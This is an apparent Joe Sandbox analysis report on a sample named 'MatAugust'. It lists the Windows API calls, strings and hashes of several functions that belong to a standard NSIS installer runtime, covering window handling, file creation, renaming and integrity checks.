GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Aborting: "%s", xrefs: 0040161D
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Call: %d, xrefs: 0040165A
detailprint: %s, xrefs: 00401679
Rename: %s, xrefs: 004018F8
CreateDirectory: "%s" created, xrefs: 00401849
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" (%d), xrefs: 004017BF
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename failed: %s, xrefs: 0040194B
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Jump: %d, xrefs: 00401602
Rename on reboot: %s, xrefs: 00401943

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd20, xrefs: 00405B9D
B%F, xrefs: 00405A1F
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
.exe, xrefs: 00405A3D
.DEFAULT\Control Panel\International, xrefs: 00405999
_Nb, xrefs: 00405AD1
RichEdit20A, xrefs: 00405BB6, 00405BBB
@rD, xrefs: 00405965
@%F, xrefs: 004059F6
RichEd32, xrefs: 00405BA8
RichEdit, xrefs: 00405BC4

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user retry, xrefs: 00401B40
File: error, user abort, xrefs: 00401B53
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Error launching installer, xrefs: 004035D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Null, xrefs: 0040367E
soft, xrefs: 00403675
Inst, xrefs: 0040366C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 004033ED
X1C, xrefs: 0040343C
... %d%%, xrefs: 0040349E
P1B, xrefs: 004033A9

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(005E6278), ref: 00402387

Strings

open, xrefs: 00401EFB, 00401F00, 00401F1A
xb^, xrefs: 00401EBC, 00401F06, 00401F15, 00401F48, 00401F6E, 00401F75
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open$xb^
API String ID: 1459762280-4206742388
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(005E6278), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
